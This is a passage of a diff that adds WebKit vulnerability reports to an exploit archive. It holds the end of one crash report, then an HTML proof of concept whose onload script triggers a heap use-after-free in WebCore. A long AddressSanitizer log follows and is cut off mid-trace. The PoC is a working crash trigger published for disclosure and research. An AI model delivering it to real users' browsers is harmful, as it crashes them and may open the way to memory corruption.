+    #8 0x6fbb9557f in WebCore::RenderTreeUpdater::updateTextRenderer(WebCore::Text&, WebCore::Style::TextUpdate const*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b9557f)
+    #9 0x6fbb95138 in WebCore::RenderTreeUpdater::updateRenderTree(WebCore::ContainerNode&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b95138)
+    #10 0x6fbb9470a in WebCore::RenderTreeUpdater::commit(std::__1::unique_ptr<WebCore::Style::Update const, std::__1::default_delete<WebCore::Style::Update const> >) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b9470a)
+    #11 0x6fa44ccdd in WebCore::Document::resolveStyle(WebCore::Document::ResolveStyleType) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x244ccdd)
+    #12 0x6fa44e351 in WebCore::Document::updateStyleIfNeeded() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x244e351)
+    #13 0x6fa470996 in WebCore::Document::finishedParsing() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2470996)
+    #14 0x6faa98e24 in WebCore::HTMLDocumentParser::prepareToStopParsing() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2a98e24)
+    #15 0x6fad2970b in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2d2970b)
+    #16 0x6facf2deb in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2cf2deb)
+    #17 0x6fae35097 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2e35097)
+    #18 0x6fae31abe in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2e31abe)
+    #19 0x6fadc8f7e in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2dc8f7e)
+    #20 0x10ebc37cb in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xdec7cb)
+    #21 0x10ebc7d2e in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xdf0d2e)
+    #22 0x10ebc702e in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xdf002e)
+    #23 0x10e1af978 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x3d8978)
+    #24 0x10df28e2e in IPC::Connection::dispatchMessage(std::__1::unique_ptr<IPC::Decoder, std::__1::default_delete<IPC::Decoder> >) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x151e2e)
+    #25 0x10df32bd6 in IPC::Connection::dispatchOneMessage() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x15bbd6)
+    #26 0x7079f1c07 in WTF::RunLoop::performWork() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x8fc07)
+    #27 0x7079f2686 in WTF::RunLoop::performWork(void*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x90686)
+    #28 0x7fff54e22a60 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0xa3a60)
+    #29 0x7fff54edc47b in __CFRunLoopDoSource0 (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x15d47b)
+
+SUMMARY: AddressSanitizer: heap-use-after-free (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b20766) in WebCore::SVGTextLayoutAttributes::context()
+Shadow bytes around the buggy address:
+  0x1c2400010a10: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
+  0x1c2400010a20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x1c2400010a30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x1c2400010a40: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
+  0x1c2400010a50: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
+=>0x1c2400010a60: fd fd fd fd[fd]fd fd fd fd fd fa fa fa fa fa fa
+  0x1c2400010a70: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
+  0x1c2400010a80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x1c2400010a90: 00 00 00 00 00 00 00 00 00 00 fa fa fa fa fa fa
+  0x1c2400010aa0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
+  0x1c2400010ab0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+Shadow byte legend (one shadow byte represents 8 application bytes):
+  Addressable:           00
+  Partially addressable: 01 02 03 04 05 06 07 
+  Heap left redzone:       fa
+  Freed heap region:       fd
+  Stack left redzone:      f1
+  Stack mid redzone:       f2
+  Stack right redzone:     f3
+  Stack after return:      f5
+  Stack use after scope:   f8
+  Global redzone:          f9
+  Global init order:       f6
+  Poisoned by user:        f7
+  Container overflow:      fc
+  Array cookie:            ac
+  Intra object redzone:    bb
+  ASan internal:           fe
+  Left alloca redzone:     ca
+  Right alloca redzone:    cb
+==25081==ABORTING
+
+
+WebKit bug tracker link: https://bugs.webkit.org/show_bug.cgi?id=186656
+Apple product security report ID: 693279368
+-->
\ No newline at end of file
diff --git a/exploits/multiple/dos/45489.html b/exploits/multiple/dos/45489.html
new file mode 100644
index 000000000..d2a9e0652
--- /dev/null
+++ b/exploits/multiple/dos/45489.html
@@ -0,0 +1,214 @@
+<!--
+There is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on the ASan build of the latest WebKit source on OSX.
+
+PoC:
+
+=================================================================
+-->
+
+<style>
+::selection, input:focus, .class0, ul::first-letter { -webkit-column-count: 85; float: left; }
+</style>
+<script>
+function jsfuzzer() {
+var fuzzervars = {};
+try { /* */ var00034 = document.getSelection(); } catch(e) { }
+try { var00034.setPosition(htmlvar00003); var var00043 } catch(e) { }
+try { /* newvar{var00104:Element} */ var var00104 = htmlvar00013; } catch(e) { }
+try { /* newvar{var00111:HTMLSelectElement} */ var00111 = document.createElement("select"); } catch(e) { }
+try { var00111.add(htmlvar00007); var00183 = var00034.focusNode; } catch(e) { }
+try { htmlvar00013.align = "RIGHT"; } catch(e) { }
+try { htmlvar00003.appendChild(var00104); } catch(e) { }
+try { var00183.className = "htmlvar00004"; } catch(e) { }
+try { var var00140 = window.getSelection(); } catch(e) { }
+try { /* newvar{var00190:boolean} */ var00190 = document.execCommand("selectAll", false); } catch(e) { }
+try { var00140.deleteFromDocument(); } catch(e) { }
+}
+</script>
+<body onload=jsfuzzer()>
+<menu id="htmlvar00002">TYu</menu>
+<ul id="htmlvar00003" class="class0">R</ul>
+<optgroup id="htmlvar00007">a</optgroup>
+<table id="htmlvar00013"></table>
+
+<!--
+=================================================================
+
+ASan log:
+
+=================================================================
+==24960==ERROR: AddressSanitizer: heap-use-after-free on address 0x612000074470 at pc 0x0001153e5c49 bp 0x7ffee78591e0 sp 0x7ffee78591d8
+READ of size 4 at 0x612000074470 thread T0
+==24960==WARNING: invalid path to external symbolizer!
+==24960==WARNING: Failed to use and restart external symbolizer!
+    #0 0x1153e5c48 in WebCore::RenderObject::RenderObjectBitfields::isBox() const (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb9c48)
+    #1 0x1153e5be4 in WebCore::RenderObject::isText() const (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb9be4)
+    #2 0x11636f808 in WebCore::RenderObject::isRenderElement() const (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1043808)
+    #3 0x11636f75d in WebCore::RenderObject::isRenderBlock() const (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x104375d)
+    #4 0x118ead15b in WebCore::RenderTreeBuilder::removeAnonymousWrappersForInlineChildrenIfNeeded(WebCore::RenderElement&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b8115b)
+    #5 0x118ead53d in WebCore::RenderTreeBuilder::destroyAndCleanUpAnonymousWrappers(WebCore::RenderObject&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b8153d)
+    #6 0x118ec4171 in WebCore::RenderTreeUpdater::tearDownTextRenderer(WebCore::Text&, WebCore::RenderTreeBuilder&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b98171)
+    #7 0x118ec4447 in WebCore::RenderTreeUpdater::tearDownRenderer(WebCore::Text&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b98447)
+    #8 0x117724beb in WebCore::ContainerNode::removeBetween(WebCore::Node*, WebCore::Node*, WebCore::Node&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23f8beb)
+    #9 0x117724681 in WebCore::ContainerNode::removeChild(WebCore::Node&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23f8681)
+    #10 0x1178b5fd1 in WebCore::Node::removeChild(WebCore::Node&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2589fd1)
+    #11 0x1178f329c in WebCore::processNodes(WebCore::Range::ActionType, WTF::Vector<WTF::Ref<WebCore::Node, WTF::DumbPtrTraits<WebCore::Node> >, 0ul, WTF::CrashOnOverflow, 16ul>&, WebCore::Node*, WTF::RefPtr<WebCore::Node, WTF::DumbPtrTraits<WebCore::Node> >) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x25c729c)
+    #12 0x1178f1d09 in WebCore::processContentsBetweenOffsets(WebCore::Range::ActionType, WTF::RefPtr<WebCore::DocumentFragment, WTF::DumbPtrTraits<WebCore::DocumentFragment> >, WTF::RefPtr<WebCore::Node, WTF::DumbPtrTraits<WebCore::Node> >, unsigned int, unsigned int) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x25c5d09)
+    #13 0x1178efb47 in WebCore::Range::processContents(WebCore::Range::ActionType) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x25c3b47)
+    #14 0x1178ef263 in WebCore::Range::deleteContents() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x25c3263)
+    #15 0x1181e3e26 in WebCore::DOMSelection::deleteFromDocument() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2eb7e26)
+    #16 0x11590eee0 in WebCore::jsDOMSelectionPrototypeFunctionDeleteFromDocumentBody(JSC::ExecState*, WebCore::JSDOMSelection*, JSC::ThrowScope&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x5e2ee0)
+    #17 0x1158f3ca7 in long long WebCore::IDLOperation<WebCore::JSDOMSelection>::call<&(WebCore::jsDOMSelectionPrototypeFunctionDeleteFromDocumentBody(JSC::ExecState*, WebCore::JSDOMSelection*, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState&, char const*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x5c7ca7)
+    #18 0x11b7c8c5176  (<unknown module>)
+    #19 0x12328d3a8 in llint_entry (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1123a8)
+    #20 0x12328d3a8 in llint_entry (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1123a8)
+    #21 0x1232869da in vmEntryToJavaScript (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x10b9da)
+    #22 0x124ff1344 in JSC::Interpreter::executeCall(JSC::ExecState*, JSC::JSObject*, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1e76344)
+    #23 0x1255c2169 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x2447169)
+    #24 0x1255c22fb in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x24472fb)
+    #25 0x1255c26a1 in JSC::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x24476a1)
+    #26 0x1171d33f8 in WebCore::JSMainThreadExecState::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1ea73f8)
+    #27 0x1172218cc in WebCore::JSEventListener::handleEvent(WebCore::ScriptExecutionContext&, WebCore::Event&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1ef58cc)
+    #28 0x117860bfe in WebCore::EventTarget::fireEventListeners(WebCore::Event&, WTF::Vector<WTF::RefPtr<WebCore::RegisteredEventListener, WTF::DumbPtrTraits<WebCore::RegisteredEventListener> >, 1ul, WTF::CrashOnOverflow, 16ul>) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2534bfe)
+    #29 0x11785c1ce in WebCore::EventTarget::fireEventListeners(WebCore::Event&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x25301ce)
+    #30 0x1181e7e85 in WebCore::DOMWindow::dispatchEvent(WebCore::Event&, WebCore::EventTarget*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2ebbe85)
+    #31 0x1181f89a4 in WebCore::DOMWindow::dispatchLoadEvent() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2ecc9a4)
+    #32 0x11778086f in WebCore::Document::dispatchWindowLoadEvent() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x245486f)
+    #33 0x117779790 in WebCore::Document::implicitClose() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x244d790)
+    #34 0x118070f77 in WebCore::FrameLoader::checkCompleted() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2d44f77)
+    #35 0x11806f1bc in WebCore::FrameLoader::finishedParsing() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2d431bc)
+    #36 0x11779c9b2 in WebCore::Document::finishedParsing() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x24709b2)
+    #37 0x117dc4e24 in WebCore::HTMLDocumentParser::prepareToStopParsing() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2a98e24)
+    #38 0x11805570b in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2d2970b)
+    #39 0x11801edeb in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2cf2deb)
+    #40 0x118161097 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2e35097)
+    #41 0x11815dabe in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2e31abe)
+    #42 0x1180f4f7e in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2dc8f7e)
+    #43 0x10919e7cb in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xdec7cb)
+    #44 0x1091a2d2e in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xdf0d2e)
+    #45 0x1091a202e in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xdf002e)
+    #46 0x10878a978 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x3d8978)
+    #47 0x108503e2e in IPC::Connection::dispatchMessage(std::__1::unique_ptr<IPC::Decoder, std::__1::default_delete<IPC::Decoder> >) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x151e2e)
+    #48 0x10850dbd6 in IPC::Connection::dispatchOneMessage() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x15bbd6)
+    #49 0x12320ac07 in WTF::RunLoop::performWork() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x8fc07)
+    #50 0x12320b686 in WTF::RunLoop::performWork(void*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x90686)
+    #51 0x7fff54e22a60 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0xa3a60)
+    #52 0x7fff54edc47b in __CFRunLoopDoSource0 (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x15d47b)
+    #53 0x7fff54e054bf in __CFRunLoopDoSources0 (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x864bf)
+    #54 0x7fff54e0493c in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x8593c)
+    #55 0x7fff54e041a2 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x851a2)
+    #56 0x7fff540ead95 in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x2fd95)
+    #57 0x7fff540eab05 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x2fb05)
+    #58 0x7fff540ea883 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x2f883)
+    #59 0x7fff5239ca72 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x41a72)
+    #60 0x7fff52b32e33 in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x7d7e33)
+    #61 0x7fff52391884 in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x36884)
+    #62 0x7fff52360a71 in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x5a71)
+    #63 0x7fff7cf6cdc6 in _xpc_objc_main (/usr/lib/system/libxpc.dylib:x86_64+0x10dc6)
+    #64 0x7fff7cf6ba19 in xpc_main (/usr/lib/system/libxpc.dylib:x86_64+0xfa19)
+    #65 0x1083a24d6 in main (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development:x86_64+0x1000014d6)
+    #66 0x7fff7cc12014 in start (/usr/lib/system/libdyld.dylib:x86_64+0x1014)
+
+0x612000074470 is located 48 bytes inside of 272-byte region [0x612000074440,0x612000074550)
+freed by thread T0 here:
+    #0 0x10c4dffa4 in __sanitizer_mz_free (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/9.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x59fa4)
+    #1 0x12327df81 in bmalloc::IsoTLS::debugFree(void*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x102f81)
+    #2 0x11899e5bb in void bmalloc::IsoTLS::deallocateSlow<bmalloc::IsoConfig<272u>, WebCore::RenderBlockFlow>(bmalloc::api::IsoHeap<WebCore::RenderBlockFlow>&, void*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x36725bb)
+    #3 0x118ead420 in WebCore::RenderTreeBuilder::Block::dropAnonymousBoxChild(WebCore::RenderBlock&, WebCore::RenderBlock&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b81420)
+    #4 0x118eaa21d in WebCore::RenderTreeBuilder::Block::detach(WebCore::RenderBlock&, WebCore::RenderObject&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b7e21d)
+    #5 0x118ea9bfa in WebCore::RenderTreeBuilder::Block::detach(WebCore::RenderBlockFlow&, WebCore::RenderObject&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b7dbfa)
+    #6 0x118ea55ed in WebCore::RenderTreeBuilder::detach(WebCore::RenderElement&, WebCore::RenderObject&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b795ed)
+    #7 0x118ea51f3 in WebCore::RenderTreeBuilder::destroy(WebCore::RenderObject&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b791f3)
+    #8 0x118ea5247 in WebCore::RenderTreeBuilder::destroy(WebCore::RenderObject&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b79247)
+    #9 0x118ead532 in WebCore::RenderTreeBuilder::destroyAndCleanUpAnonymousWrappers(WebCore::RenderObject&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b81532)
+    #10 0x118ec4171 in WebCore::RenderTreeUpdater::tearDownTextRenderer(WebCore::Text&, WebCore::RenderTreeBuilder&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b98171)
+    #11 0x118ec4447 in WebCore::RenderTreeUpdater::tearDownRenderer(WebCore::Text&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3b98447)
+    #12 0x117724beb in WebCore::ContainerNode::removeBetween(WebCore::Node*, WebCore::Node*, WebCore::Node&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23f8beb)
+    #13 0x117724681 in WebCore::ContainerNode::removeChild(WebCore::Node&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23f8681)
+    #14 0x1178b5fd1 in WebCore::Node::removeChild(WebCore::Node&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2589fd1)
+    #15 0x1178f329c in WebCore::processNodes(WebCore::Range::ActionType, WTF::Vector<WTF::Ref<WebCore::Node, WTF::DumbPtrTraits<WebCore::Node> >, 0ul, WTF::CrashOnOverflow, 16ul>&, WebCore::Node*, WTF::RefPtr<WebCore::Node, WTF::DumbPtrTraits<WebCore::Node> >) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x25c729c)
+    #16 0x1178f1d09 in WebCore::processContentsBetweenOffsets(WebCore::Range::ActionType, WTF::RefPtr<WebCore::DocumentFragment, WTF::DumbPtrTraits<WebCore::DocumentFragment> >, WTF::RefPtr<WebCore::Node, WTF::DumbPtrTraits<WebCore::Node> >, unsigned int, unsigned int) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x25c5d09)
+    #17 0x1178efb47 in WebCore::Range::processContents(WebCore::Range::ActionType) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x25c3b47)
+    #18 0x1178ef263 in WebCore::Range::deleteContents() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x25c3263)
+    #19 0x1181e3e26 in WebCore::DOMSelection::deleteFromDocument() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2eb7e26)
+    #20 0x11590eee0 in WebCore::jsDOMSelectionPrototypeFunctionDeleteFromDocumentBody(JSC::ExecState*, WebCore::JSDOMSelection*, JSC::ThrowScope&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x5e2ee0)
+    #21 0x1158f3ca7 in long long WebCore::IDLOperation<WebCore::JSDOMSelection>::call<&(WebCore::jsDOMSelectionPrototypeFunctionDeleteFromDocumentBody(JSC::ExecState*, WebCore::JSDOMSelection*, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState&, char const*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x5c7ca7)
+    #22 0x11b7c8c5176  (<unknown module>)
